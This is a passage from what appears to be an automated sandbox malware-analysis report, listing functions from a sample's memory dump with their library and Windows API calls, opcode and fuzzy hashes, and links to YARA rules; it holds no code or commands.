Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: c05294e5ca4f42c5b8c4f3fd8f54b8e6c90333f05db755c281a49ac0d012a933
Instruction ID: 524e606aebf2ec8748de53fdf399442298332500224810dc01c1c13a12fc7226
Opcode Fuzzy Hash: c05294e5ca4f42c5b8c4f3fd8f54b8e6c90333f05db755c281a49ac0d012a933
Instruction Fuzzy Hash: D2018471C21639FBCF11AFE5AC0199E7BA1AF80360F188115B8246A1A1D7758A71DF92

Function 002255C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00228D58: __getptd_noexit.LIBCMT ref: 00228D58

__lock_file.LIBCMT ref: 0022560B

Part of subcall function 00226E3E: __lock.LIBCMT ref: 00226E61

__fclose_nolock.LIBCMT ref: 00225616

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: bae58072c240f60b2d1ec32cf665f9fe11b943f8b4881a27e1c13e1005ff23d3
Instruction ID: 951706e357a9afaf891fcd64f5a1bc74fef22440377c6d13c4d74e892fba29c6
Opcode Fuzzy Hash: bae58072c240f60b2d1ec32cf665f9fe11b943f8b4881a27e1c13e1005ff23d3
Instruction Fuzzy Hash: 78F09072832B35BAD7116FF5A802B6E67E16F41374F65C209A428AB1C1CFBC89319F51

Function 00225E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00225EB4
__ftell_nolock.LIBCMT ref: 00225EBF

Part of subcall function 00228D58: __getptd_noexit.LIBCMT ref: 00228D58

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 58d992ba4e0c65a21aac5e98a51dce66aec1d16931f9333d1c55cdc000f5249f
Instruction ID: b1948901f2d225712b9eca7cd0606f337d5d967c27809c886543621a9fcba183
Opcode Fuzzy Hash: 58d992ba4e0c65a21aac5e98a51dce66aec1d16931f9333d1c55cdc000f5249f
Instruction Fuzzy Hash: 69F0A732932635BAD700BBF4A9037AE76906F11335F228206B024EF1C2CF788A219E55

Function 00215AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00215AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00215B1F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: c46db6cd51ba6e8e4d9cbbc47b1c65ce801a2268fd99699e813649e1eab8b2d1
Instruction ID: db7a964fae994781909950e89aaaf004ed46ad59d8f386a8336fd9df6c418d23
Opcode Fuzzy Hash: c46db6cd51ba6e8e4d9cbbc47b1c65ce801a2268fd99699e813649e1eab8b2d1
Instruction Fuzzy Hash: 13F0A7718183189FD792CF64EC49BD577BC9B0030CF0001EAAE4896296D7750B98CF52

Function 0027C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: 762228298756163ea217e48390d25faa466bb6d3b4c2ca557253a76de86e5cf7
Instruction ID: f77342e7b82058977485d6c652f8f3a1d199c953c06a79ab00eb9dbeff4405ee
Opcode Fuzzy Hash: 762228298756163ea217e48390d25faa466bb6d3b4c2ca557253a76de86e5cf7
Instruction Fuzzy Hash: 7CB16C74A1010AEFCB14EFA4D891DEEB7B5FF58710F20805AF919A7291EB70A961CF50

Function 0020A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9358d82867dec729222fa33caa0bf836bf796f9e05f72a6893d2084dc466022f
Instruction ID: 572014515061ab824e03f13e1f081083d4086ced0c6e84701d52580cf73ee938
Opcode Fuzzy Hash: 9358d82867dec729222fa33caa0bf836bf796f9e05f72a6893d2084dc466022f
Instruction Fuzzy Hash: F261DE7062030ADFDB14DF54C881A7AB7F9EF44300F91806DE9169B292D7B4EDA4CB51

Function 0021343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0021351A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4563fcb7776a1db93077111d184ef24d1a89efd25b8d2f55c3160c07aaa85a14
Instruction ID: f9d77d6b37dc894fe9f6b727014d46a5fb3a68d3a58ed43022c001f3553ff98e
Opcode Fuzzy Hash: 4563fcb7776a1db93077111d184ef24d1a89efd25b8d2f55c3160c07aaa85a14
Instruction Fuzzy Hash: 0931C075224613EFD724DF18D480AA2F7E2FF18310754C569E88A8B751DB70E9A1CB90

Function 0023E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0023E2EA

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1d728144b5c91ffffc429977be377f24aacbfae67ac0cba24856883fd77c0f12
Instruction ID: 129a833810dea5603c858a339da99c1f0c4e262b04419ac1303b39352d6ee174
Opcode Fuzzy Hash: 1d728144b5c91ffffc429977be377f24aacbfae67ac0cba24856883fd77c0f12
Instruction Fuzzy Hash: 2641E8B4514351DFDB14DF14C488B1ABBE1BF55308F0988ACE8895B3A2C371E8A5CF52

Function 002149C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00214B29: FreeLibrary.KERNEL32(00000000,?), ref: 00214B63

Part of subcall function 0022547B: __wfsopen.LIBCMT ref: 00225486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002127AF,?,00000001), ref: 002149F4

Part of subcall function 00214ADE: FreeLibrary.KERNEL32(00000000), ref: 00214B18

Part of subcall function 002148B0: _memmove.LIBCMT ref: 002148FA

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: e095465daafccaa24f6240e7fcdd904820162251d17df1000d1a58beb9ec743e
Instruction ID: 836ec8f4ce80b6d57aee73b5d917a983482f49a0a42af52728160a05f284df5e
Opcode Fuzzy Hash: e095465daafccaa24f6240e7fcdd904820162251d17df1000d1a58beb9ec743e
Instruction Fuzzy Hash: 31110831670205ABCB10FF60CC66FEE76E89F50711F108419F949A6181EF719AA0AB94

Function 00211BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00211BFE

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4eedd1dc3ef2d040f48d2ad3116bb2ff473d62fe239962d9940d02a90ea47eac
Instruction ID: 590d7b92c0dc34197bd0b1515dae10e9cfaf639496fdd33f927c1cf4622576a1
Opcode Fuzzy Hash: 4eedd1dc3ef2d040f48d2ad3116bb2ff473d62fe239962d9940d02a90ea47eac
Instruction Fuzzy Hash: 1C117F75214601EFC724CF28E481956F7E9FF58350720842EE98ACB661E732E8A1CF40

Function 0023E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0023E3CE

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: ba23ce928f44ca481b19b916624037134fb3556ad47868833a271e2e4b959816
Instruction ID: 3dfbeb6ae0f270e830b15860f67a10a08628becf5a2d06db6778d4967af4bc13
Opcode Fuzzy Hash: ba23ce928f44ca481b19b916624037134fb3556ad47868833a271e2e4b959816
Instruction Fuzzy Hash: AF21F3B4528356DFDB14DF54C448B1ABBE5BF88304F054968F88A573A2C731E869CF92

Function 00211A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00211A77

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 909c6eb8082f508c27c1810d4325afa5a930f6fc64b08e6dae0c8ccad2a2c9e0
Instruction ID: 105b1603dab1bdbc4c07effe36c8669f5425a05ae0bf52dc3ac62122aba1aa0a
Opcode Fuzzy Hash: 909c6eb8082f508c27c1810d4325afa5a930f6fc64b08e6dae0c8ccad2a2c9e0
Instruction Fuzzy Hash: 9601F7722607057EC3205F78E802EA7BBD49F44790F108529F61ACA1D1DA71E4A08A50

Function 0027495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00274998

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 63b408de5cdb99ec0ed3b7faa29e05afd47bc68a80a69e78fc185bb3aa7dd335
Instruction ID: 96bc952c8ad4f3d9446d14dc9e62842b8f61958f4ca1a0e76417975f684a4eb8
Opcode Fuzzy Hash: 63b408de5cdb99ec0ed3b7faa29e05afd47bc68a80a69e78fc185bb3aa7dd335
Instruction Fuzzy Hash: 5FF03175618209BFDB14FBA5D84ACAF77BCEF55320B004056F9089B251DE70ADA1CB50

Function 00267C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00220FE6: std::exception::exception.LIBCMT ref: 0022101C
Part of subcall function 00220FE6: __CxxThrowException@8.LIBCMT ref: 00221031

_memset.LIBCMT ref: 00267CB4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Exception@8Throw_memsetstd::exception::exception
String ID:
API String ID: 525207782-0
Opcode ID: 4a3d1a69a03616c74ed48044f8c5a5013d041816e25dad37c22da3cf1f719b36
Instruction ID: 8bc1741fa8249591e2c26efc2d2507133c2f3003ed229d1247ed10d5992cfb0d
Opcode Fuzzy Hash: 4a3d1a69a03616c74ed48044f8c5a5013d041816e25dad37c22da3cf1f719b36
Instruction Fuzzy Hash: 9801F674214201AFD321EF9CE541F05BBE1AF59310F24C49AF5888B3A2DB72E860CF90

Function 0023DC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00220FE6: std::exception::exception.LIBCMT ref: 0022101C
Part of subcall function 00220FE6: __CxxThrowException@8.LIBCMT ref: 00221031

_memmove.LIBCMT ref: 0023DC8B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Exception@8Throw_memmovestd::exception::exception
String ID:
API String ID: 1602317333-0
Opcode ID: 822e073b979b01a60d8c400866c0d16c4e67a578bc9371f30400c024d109022d
Instruction ID: 95ad8f5db4e4846852efba32866e1e9553d9a28884671877801c82221dcc3acc
Opcode Fuzzy Hash: 822e073b979b01a60d8c400866c0d16c4e67a578bc9371f30400c024d109022d
Instruction Fuzzy Hash: 3EF0FFB4654201EFD710DF68D581E15BBE1BF19300B24845CE6898B393EB72D821CF91

Function 00214A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00214AA4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 4b6257c23dab781dd7cddd23635f0fdab2a375d73707707c3e3a180310f1fad2
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: ECF085B6410208BFDF109F85EC00CEBBBB9EF89720F108198F9045A210D272EA218BA0

Function 00214A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,002127AF,?,00000001), ref: 00214A63

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: cfc1f88835174791eeb53b7d4be4b051b933976674be7d6bbb3c5246ebb3dcb4
Instruction ID: 7510dff0a54ea5d6e76b76d957e61f93a9a3e5b80058f33e1b79aa3b8fbff505
Opcode Fuzzy Hash: cfc1f88835174791eeb53b7d4be4b051b933976674be7d6bbb3c5246ebb3dcb4
Instruction Fuzzy Hash: 97F0A971160712CFCB34AF64E4A4896BBF0BF24326329893EE5EB83610C33199A0CF44

Function 00240A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00240A84

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 876eb7b493fe640a48694539137a08602cf178d5f8ab372a87382ca4c0ea20d3
Instruction ID: 299efb1b0dc38a7442bd5075b76d0fa24bbed5cb325a74bbe09d3d30ce1246f4
Opcode Fuzzy Hash: 876eb7b493fe640a48694539137a08602cf178d5f8ab372a87382ca4c0ea20d3
Instruction Fuzzy Hash: 1EE02BB1B383569EE7349F74E484B22FBE8AB00310F10441BD69581282E3B568F49BA1

Function 00214AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00214AD0

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 9996b90d1a81f14f4157b6249c02b7a9386890b8ccee9bfc34b5166c4ad956ff
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: 7EF0F87241020DFFDF05DF90C941EAABB79FF14314F208589FD198A212D776DA61AB91

Function 002209C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002209E4

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 0b8d73d868a8123b67437c09d2d066be9951535bede14917c48623dbc7aeb95a
Instruction ID: 0e2c0597eda7bf6e28c8dfb971db44e077d6cd21344e012366f8356845ea241a
Opcode Fuzzy Hash: 0b8d73d868a8123b67437c09d2d066be9951535bede14917c48623dbc7aeb95a
Instruction Fuzzy Hash: EFE086369101285BC72196A89C05FEAB7DDDF89690F0541B6FD08D7204D9609CA18A91

Function 00264FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00263BFE), ref: 00264FED

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

